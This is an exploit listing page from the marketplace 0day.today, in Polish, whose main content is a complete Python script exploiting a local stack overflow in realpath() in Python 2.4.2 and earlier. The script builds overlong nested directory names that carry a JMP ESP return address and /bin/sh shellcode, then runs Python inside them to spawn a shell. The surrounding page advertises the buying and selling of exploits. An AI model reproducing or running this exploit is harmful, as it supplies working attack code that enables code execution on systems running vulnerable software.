0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Python <= 2.4.2 realpath() Local Stack Overflow Exploit
Autor
Ryzyko
![](/img/risk/critlow_0.gif)
Nieskategoryzowane Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
======================================================= Python <= 2.4.2 realpath() Local Stack Overflow Exploit ======================================================= #!/usr/bin/python # gexp-python.py # # Python <= 2.4.2 realpath() Local Stack Overflow # ----------------------------------------------- # Against VA Space Randomization. # # Copyright (c) 2006 Gotfault Security # # Bug found and developed by: dx/vaxen (Gotfault Security), # posidron (Tripbit Research Group). # Enviroment: # # Kernel Version : 2.6.12.5-vs2.0 # GCC Version : 4.0.3 # Libc Version : 2.3.5 # # Special greets goes to : posidron from tripbit.net # RFDSLabs, barros, izik, # Gotfault Security Community. # # Original Reference: # http://gotfault.net/research/exploit/gexp-python.py import os # JMP *%ESP @ linux-gate.so.1 jmp = "\x5f\xe7\xff\xff" shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" os.chdir("/tmp") base = os.getcwd() dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) os.makedirs(dir) os.chdir(dir) os.system('> vuln.py; python vuln.py') os.remove("vuln.py") os.chdir(base) os.removedirs(dir) # 0day.today [2024-06-30] #